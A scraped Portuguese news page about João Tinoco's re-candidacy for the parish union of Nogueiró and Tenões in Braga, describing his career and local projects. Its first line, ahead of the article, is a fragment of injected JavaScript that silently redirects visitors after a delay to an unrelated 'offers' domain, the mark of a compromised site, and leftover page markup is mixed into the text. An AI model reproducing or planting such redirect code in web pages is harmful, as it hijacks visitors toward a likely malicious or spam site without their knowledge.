{ window.location.replace('http://offers25942.xyz/'); }, delay);})();single single-noticias postid-3418 _masterslider _ms_version_3.7.8" id="page_body">

João Tinoco para continuar Nogueiró e Tenões

“Continuar a União pela nossa terra, pela nossa gente”. É com este mote que João Tinoco apresenta a sua recandidatura como independente à Junta da União de Freguesias de Nogueiró e Tenões, contando com o apoio da Coligação “Juntos por Braga”.

João Tinoco é natural de Nogueiró, freguesia onde vive há 66 anos. Casado, pai de dois filhos, dedica de forma exclusiva o seu tempo à autarquia local. Profissionalmente foi professor do ensino básico.

Mantendo-se sempre ligado às iniciativas culturais e associativas da freguesia, tendo sido fundador e agente ativo em muitas delas, João Tinoco conhece ao pormenor a realidade da UF que lidera. É um autarca muito experiente, com 42 anos de serviço à causa pública, sendo presidente de Junta há 36 anos.

O trabalho realizado em Nogueiró e Tenões fala praticamente por si. Mas olhando apenas para os últimos quatro anos, a UF reforçou ainda mais a qualidade e o número das suas valências. Na área educativa, destaque para a colocação de quadros interativos e a criação de um campo de jogos na Escola de Tenões. Já nas escolas de Nogueiró realizaram-se melhoramentos das acessibilidades.

Relativamente a outros projetos que também favorecem diretamente a qualidade de vida da população, nota para a edificação de um Centro Cívico no qual decorrem várias atividades; as importantes requalificações do Largo da Mãe d’Água e da Igreja Paroquial de Nogueiró; a requalificação do ringue de Tenões; a abertura do posto dos CTT e Loja do Cidadão; o alargamento da Horta Urbana das Lameiras e o melhoramento da rede viária em vários pontos da UF. Importa referir que o apoio incondicional à população durante a situação pandémica foi uma das principais prioridades da autarquia local.

A LICAU – Lista Independente Continuar a União deseja continuar a desenvolver Nogueiró e Tenões e, para isso, já foram identificadas as prioridades de ação para os próximos quatro anos. A melhoria e a criação de equipamentos sociais, a aposta no desporto e lazer, reforçar e aumentar a qualidade da oferta cultural, requalificar e criar espaços públicos, bem como continuar a apostar em medidas de apoio social. Serão estas as grandes áreas para as quais a equipa liderada por João Tinoco irá apresentar um programa eleitoral ambicioso que permitirá sustentar o futuro desta UF.